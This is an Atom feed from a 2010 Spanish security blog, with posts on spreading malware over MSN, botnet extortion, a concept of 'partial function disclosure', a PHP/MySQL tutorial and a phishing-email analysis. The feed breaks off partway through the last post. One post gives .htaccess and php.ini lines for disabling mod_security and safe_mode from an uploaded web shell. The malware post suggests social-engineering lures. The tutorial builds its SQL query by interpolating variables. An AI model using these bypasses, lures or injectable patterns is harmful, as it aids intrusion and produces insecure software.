<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" gd:etag="W/&quot;CEECRXY7cSp7ImA9WxBbEE4.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876</id><updated>2010-03-07T23:17:44.809-08:00</updated><title>El Blog del Dr.White - Seguridad Informática Perú</title><subtitle type="html">Hacking, Seguridad Informática, Sql Injection, Blind Sql Injection, Seguridad Web, TEST DE INTRUSION, AUDITORIAS DE SEGURIDAD, Programación, Ethical Hacking y mucho mas.</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>382</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/seguridadblanca" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="seguridadblanca" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">seguridadblanca</feedburner:emailServiceId><feedburner:feedburnerHostname xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">http://feedburner.google.com</feedburner:feedburnerHostname><entry gd:etag="W/&quot;DkUDRncyfSp7ImA9WxBVEks.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-2171504664638595737</id><published>2010-02-15T11:17:00.001-08:00</published><updated>2010-02-15T12:04:37.995-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-02-15T12:04:37.995-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Virus y Malware" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>Técnicas de Infección con Malware y Procedimiento I</title><content type="html">Después de un tiempo de inactividad del blog he decidido empezar con un tema que calculo les va a servir a ustedes...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El tema de infecciones es algo que está afectando en la actualidad y pues les quiero mostrar el primer ejemplo, es del cual hablaremos hoy...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Infección Vía MSN, cuantas veces no les ha pasado que alguien le dice algo como:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hubo un Accidente en la puerta de mi casa mira las fotos&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;y a continuación nos mandan un archivo .zip o .rar con las supuestas fotos o sino&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Mira las fotos de la fiesta :s no te ves tan bien...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;y a continuación nos mandan un .zip o un .rar&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora les voy a explicar como funcionan estas técnicas... y como yo las usaría masomenos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno para empezar nosotros debemos saber algo básico... las Apis de MSN para hacer el malware...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Explicación de Apis de MSN click &lt;a href="http://carlosnuel.spaces.live.com/blog/cns!7102C67D335FEB24!367.entry"&gt;aquí&lt;/a&gt; y &lt;a href="http://foro.elhacker.net/programacion_vb/guia_msn_en_vb-t153975.0.html;wap2="&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno ahora si miren lo que pasa es que normalmente estos malwares no son muy creíbles entonces debemos usar algo que convenza a la gente en especial si son hombres...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;un ejemplo:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Mira las fotos que me conseguí de la mamasita de megan fox&lt;br /&gt;&lt;br /&gt;y a continuación el envio del RAR o ZIP que contenga esto...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;otro punto clave que tenemos que tener claro es que el RAR debe tener siertas cosas claves en la configuración según con que los queremos infectar...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;En el caso de que fuese un virus de pharming hay técnicas de como ocultar archivos en los .rar de tal manera que al descomprimir automáticamente se sobreescriba el archivo hosts y otras cosas que es algo de lo que voy a hablar pronto pero por ahora vamos a ver otra cosa que haremos con la infección...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno hemos creado nuestro malware que se reproduce por MSN y ahora solo falta que poner en el .rar bueno miren, hay grupos de ciber delincuentes que se dedícan a la amenaza y extorción de web sites por ejemplo:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Encontramos un RFI en una web subimos una Shell y leugo le decimos al dueño que nos de dinero o la defaceamos, esto lógico causa una malestar en el webmaster y se niega, horas despues, la página cae, algo asi es para lo que se usa este tipo de malware...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Se los conoce como BOTNETS, digamos que es una RED de Computadoras que estan a la disposición de un mismo "master", entonces como funciona esto... el Master le mando a 500 personas su malware, luegos estas 500 se la mandaron a dos cada uno osea dos cayeron por que se ve como el anterior ejemplo, lo de megan fox, ahora asi va creciendo la botnet, una vez que se tiene un número prudente de computadoras zombies se procede a extorcionar a la gente... La siguiente conversación es Real solo sustituyo los nombres para no afectar a nadie...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Extorcionador dice:&lt;br /&gt;* Eres el Admin de XXXXXXXXXXXXX.XXX?&lt;br /&gt;&lt;br /&gt;Admin dice:&lt;br /&gt;* Si por?&lt;br /&gt;&lt;br /&gt;Extorcionador dice:&lt;br /&gt;* Resulta que necesito dinero y tu me lo vas a dar&lt;br /&gt;* en el caso que te reuses cago tu site&lt;br /&gt;&lt;br /&gt;Admin dice:&lt;br /&gt;* de qe me hablas????&lt;br /&gt;&lt;br /&gt;Extorcionador dice:&lt;br /&gt;* Puedo sacar tu sitio de internet en cuanto se me de la gana pero si quieres que siga en internet entonces necesito 40€&lt;br /&gt;&lt;br /&gt;Admin dice:&lt;br /&gt;* jajaja quisiera ver eso&lt;br /&gt;&lt;br /&gt;Extorcionador dice:&lt;br /&gt;* Mira tu sitio ahora mismo -.-&lt;br /&gt;&lt;br /&gt;Admin dice:&lt;br /&gt;* como mierda hiciste eso, dejame en pax yo no he hecho nada como para que me cagues mi sitio webon que te pasa&lt;br /&gt;&lt;br /&gt;Extorcionador dice:&lt;br /&gt;* no es personal necesito dinero y me lo vas a dar o no&lt;br /&gt;&lt;br /&gt;Admin dice:&lt;br /&gt;* no&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Después de dos días el Admin le pagó los 40 Euros que le pidió, lo que hacía era usar el ancho de banda de todas sus computadoras zombies para hacerle un ataque de D.d.o.S (Distributed Denial Of Service) a su víctima...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bajo un procedimiento como este muchos delincuentes hacen de las suyas, pronto pondré medidas que se deben tomar para no sufrir de este tipo de ataques y como evitar ser infectado y formar parte de una BOTNET...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PD: Pido disculpas por no poner nada pero he andado ocupado, pronto comenzaré a poner posts de calidad nuevamente :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-2171504664638595737?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/2171504664638595737/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=2171504664638595737&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/2171504664638595737?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/2171504664638595737?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/02/tecnicas-de-infeccion-con-malware-y.html" title="Técnicas de Infección con Malware y Procedimiento I" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry gd:etag="W/&quot;A0QMR3g6eCp7ImA9WxBWEEg.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-3757868216062825198</id><published>2010-02-01T13:21:00.000-08:00</published><updated>2010-02-01T13:23:06.610-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-02-01T13:23:06.610-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="bypass" /><category scheme="http://www.blogger.com/atom/ns#" term="mod_security" /><category scheme="http://www.blogger.com/atom/ns#" term=".htaccess" /><category scheme="http://www.blogger.com/atom/ns#" term="safe_mode" /><category scheme="http://www.blogger.com/atom/ns#" term="shell" /><category scheme="http://www.blogger.com/atom/ns#" term="php.ini" /><title>Otro Tip para Shells (Safe_Mode y Mod_Security) By Zero Bits</title><content type="html">Muchos ya conoceran el tutorial sobre las shells de mi amigo _84kur10_, pueden verlo desde su fuente original desde AQUI.&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Solo queria agregar a su excelente tutorial, otro tip., &lt;br&gt;&lt;br /&gt;"Bypassear safe_mode y Mod_security" para movernos mucho mejor en una shell y asi evitar problema. Dense cuenta que es un mini-tutorial que solo muestra los codes necesarios.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Muchos tienen problemas con las Shells, porque no pueden hacer varias cosas que nos interesan, ya sabemis por que (Safe_Mode y Mod_Security), ¿Como se yo que el servidor los tiene activado?, pueden notar (dependiendo de la shell) arriba de la shell, que puede decir:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;Safe_Mode = ON&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;Mod_Security = ON&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;Desactivar Mod_Securirty&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Buscamos por la shell, el fichero &lt;i&gt;.htaccess&lt;/i&gt; y añadimos el siguiente code:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;&amp;lt;IfModule mod_security.c&amp;gt;&lt;br /&gt;SecFilterEngine OFF&lt;br /&gt;SecFilterScanPort OFF&lt;br /&gt;SecFilterCheckURLEncoding OFF&lt;br /&gt;SecFilterCheckUnicodeEncoding OFF&lt;br /&gt;&amp;lt;/IfModule&amp;gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;Actualiza y ve xD... &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;&lt;font color="red"&gt;Desactivar Safe_Mode&lt;/font&gt;&lt;/b&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Ahi varios modos, pero el mas facil es modificar &lt;i&gt;Php.ini&lt;/i&gt;:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;register_globals = On&lt;br /&gt;engine = On&lt;br /&gt;safe_mode = Off&lt;br /&gt;safe_mode_exec_dir = On&lt;br /&gt;Safe_mode_include_dir = On&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Para conocer un poco mas podemos leer:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;* &lt;a href="http://www.diosdelared.com/redirect.php?go=http://www.ilegalintrusion.net/foro/index.php?topic=738.0" target="link"&gt;Tips (PhpShells) que son y como subirlas by _84kur10_&lt;/a&gt; (Aunque ya lo puse arriba)&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;* Leer sobre Safe_Mode y Mod_Security en servers.&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Autor: Zero Bits&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Mail: Zero_Bits@GobiernoFederal.com&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;PD: En los ultimos tutos no eh dejado mi email pero aqui esta ^^&lt;br&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-3757868216062825198?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/3757868216062825198/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=3757868216062825198&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/3757868216062825198?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/3757868216062825198?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/02/otro-tip-para-shells-safemode-y.html" title="Otro Tip para Shells (Safe_Mode y Mod_Security) By Zero Bits" /><author><name>Zero Bits</name><uri>http://www.blogger.com/profile/17744207739622178280</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="15367576321469896738" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;DUYDQ3o_cCp7ImA9WxBXGUg.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-1440152206124975674</id><published>2010-01-31T08:26:00.000-08:00</published><updated>2010-01-31T08:59:32.448-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-31T08:59:32.448-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="full path disclosure" /><category scheme="http://www.blogger.com/atom/ns#" term="nuevo" /><title>Partial Function Disclosure --&gt; New Term</title><content type="html">El PFD consiste en que tras introducir valores malformados podamos obtener errores de los cuales extraer la ruta y parcialmente algunas funciones usadas por la web. Cómo podemos observar el concepto es parecido al del FPD (Full Path Disclosure) y su explotación será  casi la misma que el FPD pero la diferencia radica en que a la hora de explotar el bug se mostraran algunas de las funciones que son usadas por la aplicación web como se muestra a continuación en la figura.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_112F2TUuD7w/S2WwIVUUmOI/AAAAAAAAADo/2CAw9Lry92I/s1600-h/jordan.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 200px; height: 96px;" src="http://1.bp.blogspot.com/_112F2TUuD7w/S2WwIVUUmOI/AAAAAAAAADo/2CAw9Lry92I/s200/jordan.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5432942182700194018" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Como vemos el bug lo estamos explotando asiendo a la variable query= en un array como se muestra en la imagen (query[]= ) lo cual aparte de mostrarnos la ruta con lo cual vendría a ser un FPD (Full Path Disclosure). Aparte se  mostrarían algunas de las funciones que  usa la web y la línea de código en la cual están siendo usadas lo cual vendría a ser el PFD (Partial Function Disclosure) que es el tema de este paper.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Algunos tendrán la pregunta diciendo de que sirve poder ver algunas de la funciones usadas en  la aplicación web pues bueno todo nos podría ser útil para saber a que tipo de filtros pro ejemplo nos estamos enfrenta y a la vez nos vamos asiendo una idea de cómo esta programa la aplicación web y que tipo de seguridad se esta empleando.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno con esto termino esta explicación de PFD (Partial Function Disclosure) &lt;br /&gt;PFD (Partial Function Disclosure) escrito y Termino inventado por Jordan Alexander Diaz Diaz (jdiaz@aqpgrid.com)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;---------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno he decidido compartir esta entrada para que den su opinion de este tema, mi opinion humilde y personal es:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;me es una idea original el buscar nuevos nombres pero es según yo es lo mismo que un FPD, yo no soy un experto asi que les dejo a su análisis...&lt;br /&gt;&lt;br /&gt;además si alguien me puede mostrar una web con FPD que no me muestre función me gustaría verla...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-1440152206124975674?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/1440152206124975674/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=1440152206124975674&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/1440152206124975674?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/1440152206124975674?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/partial-function-disclosure-new-term.html" title="Partial Function Disclosure --&gt; New Term" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_112F2TUuD7w/S2WwIVUUmOI/AAAAAAAAADo/2CAw9Lry92I/s72-c/jordan.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;CUUHQH87fip7ImA9WxBXGU8.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-1717137738766331188</id><published>2010-01-30T22:28:00.000-08:00</published><updated>2010-01-30T23:33:51.106-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-30T23:33:51.106-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="seguridadblanca" /><category scheme="http://www.blogger.com/atom/ns#" term="programacion" /><title>Programando: MySql y PHP</title><content type="html">ya que &lt;a href="http://xianur0.blogspot.com/"&gt;xianur0&lt;/a&gt; me ha mostrado un bonito sistema de resaltado de código hoy he dedicido hacer un pequeño tuto de programación en PHP.&lt;br /&gt;&lt;br /&gt;MYSQL y PHP...&lt;br /&gt;&lt;br /&gt;La primera parte es declarar 4 variables... el USUARIO, PASS, HOST y BASE de DATOS&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$dbhost = 'localhost'; //host normalmente localhost&lt;br /&gt;$dbuser = 'root'; //usuario&lt;br /&gt;$dbpass = 'password'; //contraseña&lt;br /&gt;$dbname = 'users'; //nombre de la base de datos&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno como ven ahí hemos asignado a variables mediante las cuales haremos la conexion a la base de datos...&lt;br /&gt;&lt;br /&gt;usando la función mysql_connect() haremos la conexión..&lt;br /&gt;&lt;br /&gt;de la siguiente manera:&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;$conexion = mysql_connect($dbhost, $dbuser, $dbpass) or die ('No hay Conexion con el host');&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahí hemos hecho la conexión y a la vez hemos dicho or die que quiere decir o si muere (si no conecte) mostramos el mensaje que dice ahí...&lt;br /&gt;&lt;br /&gt;Ahora les voy a decir como seleccionar una Base de Datos a usar...&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;mysql_select_db($dbname) or die(mysql_error());&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;En el anterior code se ve que hacemos conexion o en el caso que no se pueda hacer la conexion entonces nos mostrará el error exacto... ahora les voy a decir como hacer una consulta...&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;$codigo = "123";&lt;br /&gt;$column = "name";&lt;br /&gt;$query="select $column from usuarios WHERE codigo=$codigo";&lt;br /&gt;$recep = mysql_query($query);&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;bueno pues con eso ya hemos hecho la consulta, ahora solo haría falta hacerle un echo y pues nos mostraría el nombre de la persona que tenga el code 123... ahora entonces concatenemos todo el code y hagamos que muestre...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;&lt;br /&gt;$dbhost = 'localhost'; //host normalmente localhost&lt;br /&gt;$dbuser = 'root'; //usuario&lt;br /&gt;$dbpass = 'password'; //contraseña&lt;br /&gt;$dbname = 'users'; //nombre de la base de datos&lt;br /&gt;&lt;br /&gt;$conexion = mysql_connect($dbhost, $dbuser, $dbpass) or die ('No hay Conexion con el host');&lt;br /&gt;mysql_select_db($dbname) or die(mysql_error());&lt;br /&gt;&lt;br /&gt;$codigo = "123";&lt;br /&gt;$column = "name";&lt;br /&gt;$query="select $column from usuarios WHERE codigo=$codigo";&lt;br /&gt;$recep = mysql_query($query);&lt;br /&gt;&lt;br /&gt;echo $recep;&lt;br /&gt;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Espero les haya gustado este mini tuto de conexiones MySql, despues avanzaremos con otro tuto de CURL() como lo prometí antes...&lt;br /&gt;&lt;br /&gt;PD: El sistema comenzará a servir despues...&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-1717137738766331188?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/1717137738766331188/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=1717137738766331188&amp;isPopup=true" title="2 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/1717137738766331188?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/1717137738766331188?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/programando-mysql-y-php.html" title="Programando: MySql y PHP" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></entry><entry gd:etag="W/&quot;DkUMQX08eSp7ImA9WxBXGEU.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-4954416823342109526</id><published>2010-01-30T11:59:00.000-08:00</published><updated>2010-01-30T12:44:40.371-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-30T12:44:40.371-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Informatica" /><category scheme="http://www.blogger.com/atom/ns#" term="phishing" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>Inteto de Hackeo de MSN</title><content type="html">Bueno debo admitir que es una "buena" técnica de phishing la que han usado pero que mejor que ustedes mismos la vean, debo disculparme a su vez por estar escribiendo tan poco en el blog lo que pasa es que ando con muchos trámites por mi colegio, pero bueno ahora si primero una previa...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno el Phishing Trata de que han intentado usar muchas veces mi pregunta secreta y para atacar por el lado psicológico el mail me lo envian con Advertencia 1, advertencia 2 y asi cosa que te confunden :p mm bueno algo asi se veia el mail:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_112F2TUuD7w/S2SSyR02wgI/AAAAAAAAADI/dhRAOuaosnI/s1600-h/phishing1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 200px; height: 22px;" src="http://2.bp.blogspot.com/_112F2TUuD7w/S2SSyR02wgI/AAAAAAAAADI/dhRAOuaosnI/s200/phishing1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5432628442991870466" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;mmm bueno luego si entramos vemos algo como:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_112F2TUuD7w/S2SUK3b52QI/AAAAAAAAADQ/C4G1RD4Hhlk/s1600-h/phishing2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 200px; height: 46px;" src="http://3.bp.blogspot.com/_112F2TUuD7w/S2SUK3b52QI/AAAAAAAAADQ/C4G1RD4Hhlk/s200/phishing2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5432629964916250882" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno la cosa es que ustedes si lo ven o por lo menos una persona que ve el mail lo puede creer ya que es recibido de:&lt;br /&gt;&lt;br /&gt;Windows Live Hotmail (member-services@live.es)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;y como ven en la anterior imagen pues dice algo creible y el link se ve bastante creible pero vamos a ver algo:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_112F2TUuD7w/S2SVLWOT0AI/AAAAAAAAADY/k6_8Bu9mRSM/s1600-h/phishing3.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 200px; height: 13px;" src="http://3.bp.blogspot.com/_112F2TUuD7w/S2SVLWOT0AI/AAAAAAAAADY/k6_8Bu9mRSM/s200/phishing3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5432631072692359170" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Eso es lo que muestra la barra del mozilla firefox cuando pongo mi mouse sobre el link... (es la barra donde dice: Esperando, Terminado, Cargando, etc, la barra inferior).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno la cosa es que ahora si ya sabemos que no es del dominio de MSN que nos llega... asi que vamos a verle el código fuente al mensaje a ver que podemos ver...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno como yo no marque como seguro el mensaje no se podía ver la imagen en donde muestro el mensaje pero igual les muestro la URL de la Imagen:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;&amp;lt;p&amp;gt;&amp;lt;img src="http://img46.imageshack.us/img46/2883/windowslivet.png" width="175" height="23" /&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Miren eso... como se dan cuenta dudo mucho que hotmail use las imagenes en imageshack... quien quiera que haya hecho esto ya cometió su primer error... ahora mas código "extraño"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&amp;lt;a href="http://mailive.es/default/am9zZW56dEBob3RtYWlsLmNvbQ.html"&amp;gt;http://mail.live.com/ppsecure/?u=am9zZW56dEBob3RtYWlsLmNvbQ==&amp;p=aHR0cDovL3d3dy5hcHBsZS5jb20vZXMvaXBob25lLw==&amp;id=MTcxNjQ4&amp;lng=es&amp;n=amFqYSBwYXJlY2Uga2Ugc29zIHZpdm8gZWg/IDpQIGJ1ZW5vIHNhbHVkb3MgYSB0dSBzZfFvcmEgOlA=&amp;x=aXBob25l&amp;lt;/a&amp;gt;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ahí está la parte clave... nos muestran un link y nos lleva a otro... y que si damos click veamos que hace nuestro navegador:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_112F2TUuD7w/S2SXlV02MRI/AAAAAAAAADg/13TNJEdGHzw/s1600-h/phishing4.jpg"&gt;&lt;img style="display:block; margin:0px auto 